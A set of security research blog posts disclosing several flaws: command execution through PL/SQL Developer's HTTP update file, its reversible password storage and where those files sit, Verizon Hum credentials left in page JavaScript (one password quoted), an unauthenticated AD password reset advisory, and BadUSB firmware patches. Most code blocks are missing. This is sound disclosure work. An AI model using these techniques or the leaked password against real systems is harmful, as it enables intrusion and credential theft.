PL/SQL Developer: HTTP to Command Execution

While looking into PL/SQL Developer – a very popular tool for working with Oracle databases, to see how it encrypts passwords I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running, to see if there is any interesting traffic – and in this case, there certainly was.

PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file.

This file is retrieved each time the application starts, and if a version listed in the file is greater than the version installed, the user will be prompted to upgrade (default behavior; otherwise user not prompted until they select Help | Check Online Updates). They have the following options:

  • Update: If a URL is provided, the application will download a file (also over HTTP), and apply the update. If no URL is provided, the option is not presented to the user.
  • Download: Executes the URL provided, so that the user’s browser will open, and immediately download the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is being performed.
  • Info: If a URL, it’s executed so that the user’s browser opens to the specified URL; otherwise content is displayed in a message box.

The are (at least) two issues here:

  • Redirect to malicious download; as the user is likely unaware that they shouldn’t trust the file downloaded as a result of using the Download option, an attacker could replace the URL and point to a malicious file, or simply leverage their privileged position to provide a malicious file at the legitimate URL.
  • Command Execution; when the user selects the Download option, the value in the file is effectively ShellExecute’d, without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user.

This means that a user believing that they are downloading an update, can actually be handing full control over to an attacker – this is a case where not bothering to use HTTPS to secure traffic, can provide multiple methods for an attacker to gain control of the user’s PC. This is a great example of the importance of using HTTPS for all traffic – it’s not just about privacy, it’s also critical for integrity.

The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website, and application changes made in version 11.0.6. It is recommended that all users update to the latest version.

Vulnerability Note: VU#229047
CVE: CVE-2016-2346

Technical Details

The update file is retrieved from – the request issued by the application looks like this:

Here’s what a response looks like – it’s a INI-like file, the Download value is the item we care about most here:

By changing the returned file, replacing this line:


With this:


When the user selects the Download option, calc.exe will be executed.

Here is an example of a pls.updates file that demonstrates this flaw (the key changes are increasing the Version, so that the user will see it as an update, clearing the Update value, so the only option is Download, and setting Download to the command that you wish to be executed):

Special Thanks

Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.

PL/SQL Developer: Nonexistent Encryption

(See here for another issue discovered during this research; Updates over HTTP & Command Execution.)

PL/SQL Developer by Allround Automations has an option to store the user’s logon history with passwords – the passwords are encrypted with a proprietary algorithm. At this point, you should know how this is going to go.

For those that don’t know, PL/SQL Developer is a tool for developers and database administrators to access Oracle – an essential tool in many enterprise environments. Instead of using something that provides some actual security like DPAPI (which itself is far from perfect, as we saw with the UPEK fiasco), they opted to use a proprietary “encryption” algorithm to protect these passwords – making it trivial to recover the passwords for any attacker that can access the preferences file(s).

Some time ago I asked the vendor about the security of the password storage – they are aware of the lack of security, but don’t make it clear to their customers.

The fact that they are aware that it isn’t secure, yet this issue has existed for years – nor made it clear to users what they are risking by activating the option is extremely disappointing. Vendors have a responsibility to protect customer information, and broken features like this completely ignore that.

The Algorithm

The encryption algorithm is quite simple, primarily consisting of a bit shift and xor – let’s take a closer look at how it works. The ciphertext produced looks like this:


The first group of four digits (2736) is the key – it’s generated based on the system uptime, producing an integer between 0 and 999, then 2,000 is added. This means that the key is has 1,000 possible values, or just under 10 bits. Of course, when you store the key with the encrypted data – key size really doesn’t matter.

After the key at the beginning, each group of four digits represents one byte – this simple code is all that’s needed to encrypt:

When you encrypt the string user/password@server, here’s what the encrypted data breaks down to:

  • 2736 = Key
  • 4562 = u
  • 4572 = s
  • 4230 = e
  • 4576 = r
  • 3066 = /
  • 4564 = p
  • 4302 = a
  • 4120 = s
  • 4130 = s
  • 4172 = w
  • 4566 = o
  • 4080 = r
  • 4442 = d
  • 4900 = @
  • 4190 = s
  • 4328 = e
  • 4194 = r
  • 4076 = v
  • 4390 = e
  • 4160 = r

The Data

The login information is stored in an INI-like file called user.prefs – under the headings of [LogonHistory] and [CurrentConnections]; storage of passwords is an option that is turned off by default, though storage of history is turned on by default. All data stored in these sections is encrypted using this method, so the presence of data in these sections does not necessarily mean that passwords are present.

These files can be stored in a number of locations (the latter are more common with older versions of the application):

  • C:\Users\<username>\AppData\Roaming\PLSQL Developer\Preferences\<username>\
  • C:\Program Files\PLSQL Developer\Preferences\<username>\
  • C:\Program Files (x86)\PLSQL Developer\Preferences\<username>\

The data format for the two sections is somewhat different, in [LogonHistory], the data is in the following format:


In [CurrentConnections], the format is <username>,<password>,<server>,,,; the login can also be stored in C:\Users\<username>\AppData\Roaming\PLSQL Developer\PLS-Recovery\*.cfg, in this same format.

This encryption method is also used in other files, though in less predictable locations.

The Proof of Concept

We have released a proof of concept tool to decrypt these logins, and as is typical, it’s open source. Simply run the executable from the command line, and it will search for the preference files and print any information it’s able to retrieve.

You can also pass in the name of a remote machine, and it will attempt to use the administrative (c$) share.


Special thanks to my frequent research partner, Brandon Wilson, for his help with this project.

Verizon Hum Leaking Credentials

or, Christmas Infosec Insanity…

A friend mentioned Hum by Verizon, a product that I hadn’t heard of but quickly caught my attention – both from a “here’s a privacy nightmare” perspective, and “I might actually use that” perspective. While looking at the site, I decided to take a look at the source code for the shopping page – what I saw was rather unexpected.

Near the top is a large block of JSON assigned to an otherwise unused variable named phpvars – included was some validation code, a number of URLs, some HTML, and the like. After seeing the first element, isDeveloperMode, I was sure this was worth a closer look.

A few lines in, I ran across something that I would have never expected from a company like Verizon:

Username, password. Embedded in JavaScript. Seriously.

In the JSON, there are several API endpoints listed, from a variety of domains (only one of which is publicly resolvable):


If any of these endpoints would allow an outside attacker to gather private data, I couldn’t say.

There are a few things about this that really surprise me:

  • How did Verizon allow this to go live?
  • Why aren’t they doing any type of post-deployment testing?
  • Weblogic12 – Seriously? Is that really an acceptable password?

The use of stolen and/or misused credentials (user name/passwords) continues to be the No. 1 way to gain access to information. Two out of three breaches exploit weak or stolen passwords, making a case for strong two-factor authentication. – Verizon Data Breach Investigations Report

I’ve reached out to Verizon via Twitter to ensure that they are aware that this information is being leaked. I attempted to email both and – neither of which are valid addresses (another surprise from a company that should have a clue).

Dovestones Software AD Self Password Reset (CVE-2015-8267)

Software AD Self Password Reset v3.0 by Dovestones Software contains a critical vulnerability in the password change functionality, that allows unauthenticated users to change the password of arbitrary accounts.

The vendor has been working with customers to upgrade them to a fixed version.

The /Reset/ChangePass function doesn’t validate that the validation questions have been answered, or validate that the account in question is enrolled. This allows an attacker to reset any account that the service account is able to reset, even if they aren’t enrolled.

The PasswordReset.Controllers.ResetController.ChangePasswordIndex() method in PasswordReset.dll fails to properly validate the user, and performs the password reset on arbitrary accounts.


Successful response:

VU#757840 – Dovestones Software AD Self Password Reset fails to properly restrict password reset request to authorized users

CVE: CVE-2015-8267

access control


Dovestones Software AD Self Password Reset fails to properly validate users, which enables an unauthenticated attacker to reset passwords for arbitrary accounts.


CWE-284: Improper Access Control – CVE-2015-8267

Dovestones Software AD Self Password Reset contains a vulnerable method PasswordReset.Controllers.ResetController.ChangePasswordIndex() in PasswordReset.dll that fails to validate the requesting user. An attacker can reset passwords for arbitrary accounts by manipulating web application requests that call the vulnerable method.


A remote, unauthenticated attacker can reset passwords for arbitrary accounts where usernames are known or can be guessed.


Apply an update

The vendor has worked directly with customers to apply updates for this and other vulnerabilities. Users who have not received an update are encouraged to contact the vendor.



Thanks to Adam Caudill for reporting this vulnerability.

This document was written by Joel Land.

Special thanks to Dovestones for their quick response, and US CERT for their help in coordinating disclosure.

Making BadUSB Work For You – DerbyCon

Last week Brandon Wilson and I were honored to speak at DerbyCon, on the work we’ve been doing on the Phison controller found in many USB thumb drives. This was my first time speaking at DerbyCon – it’s a great event, with a fantastic team making the magic happen.


Video (which I’ve haven’t been able to bring myself to watch):

Now that the dust has settled, I would like to provide some updates, thoughts, and extra information – and maybe correct an error I made during the presentation.

The Demos

We did three demos – they were simple enough that I didn’t think there was any risk of having issues. Well, lesson learned.

The machine we used was a fresh Windows install just for the talk – though in the rush, there were a couple differences between it and the machine we had been testing with. In the panic of trying to get the talk done in the short 25-minute slot, I mistook these differences for a failing of one of the demos.

Custom HID Firmware

The first of the three demos was a completely custom firmware, that presents itself as a HID device (and as a mass storage device, though without media present – this is to make firmware updates easier) – the demo went without a hitch.

I would have liked to show the tools and the update process, though there just wasn’t time. Brandon is working on videos that will be posted to YouTube that walks through each demo step by step.

The team behind the Rubber Ducky saved us a lot of time, thanks to the tools they had built – as we were able to support the same encoded format they used.

Hidden Partition

The hidden partition is a great patch, as there’s no way to tell that it’s there – everything works as expected, no reason to suspect that anything has been altered.

It divides the NAND space into two partitions, and the firmware lies about the size, to indicate that only half of the space is there. The “public” section is the first that’s mounted, and only a specific action will cause the second, hidden partition to become visible.

It’s a simple change, but it sends a clear message that there can be more than meets the eye with these devices. From a forensics perspective, the only way to ensure that what you are getting is accurate and complete, is to dump the NAND directly – without allowing the controller to access it.

Password Protection Bypass

This demo seemed to go wrong, but it actually performed perfectly – I was just in too much of a rush to think though what was happening, and why I didn’t see what I expected.

When I plugged the device in, I was expecting to see two drives from it – one “public”, the other unmounted. I only saw one. Two things went wrong here:

  • “Show Empty Drives In Explorer” – By default Windows doesn’t show unmounted removable drives in “My Computer”; this is a setting I always change, and expected to see the unmounted drive. As this was a fresh install, the default setting was still set – the drive was there, I just couldn’t see it. This threw me off.
  • Wrong Password – During the demo I typed in some random junk to the password field of the “Lock” tool, and instead of it unlocking the drive as expected, it gave me the wrong password dialog. The issue here is a bug in the Phison code, when supplying a password more than 16 characters long it treats it as a bad password. So it was working, but the password I supplied was too long, triggering that bug.

We later tested that drive again, and sure enough – it worked flawlessly, as long as the random password wasn’t longer than 16 characters.

The patch works by altering the buffer that stores the data once received over USB; it forces it to 16 “A”s, so that any password will work. Because of how it works, the patch must be applied before the user sets their password – otherwise it’ll just make the data inaccessible.

That was painful.

The (maybe) error…

During the talk I referred to modes 7 and 8 as being encrypted – this is probably wrong, at least on the devices we demoed. The two modes are password protected, and according to some documentation are encrypted, and according to other documentation they aren’t.

The question came up in a conversation after the talk – we’ve not had the time to dig into this feature more since then, but it’s looking like it’s just a password check with no encryption.

The password changing patch was added at the last minute, to replace another demo that we didn’t like – we identified the USB command being sent, and patched it. Due to time constraints we didn’t dig into the feature to verify the document (from a device manufacturer) was correct; after the question was raised we dug into a little more and looked for other documentation and code to support the claim – it looks like the document we were referencing was incorrect.

So, it looks like I misspoke – the patch still works as expected, though the feature itself seems to provide less protection than we initially thought. Sorry!

The Code & Docs

We have everything on the repo now, and we’ve added some additional documentation to the wiki.

This isn’t simple to do – the code is complicated to write, and the effort to use the patches and custom firmware is a bit more than I’d like. We’ve tried to document things as well as we can, hopefully it’s easy enough to understand.

Next Steps

We really hope that releasing this will push device manufactures to insist on signed firmware updates, and that Phison will add support for signed updates to all of the controllers it sells.

Phison isn’t the only player here, though they are the most common – I’d love to see them take the lead in improving security for these devices. They have an opportunity to stand up and protect users – as the most common provider of these controllers, I’d truly love to see them take this as an opportunity to lead the industry.

What we’ve released just scratches the surface of what can be done here – until signed updates are enforced, there’s no telling what games these devices could be playing.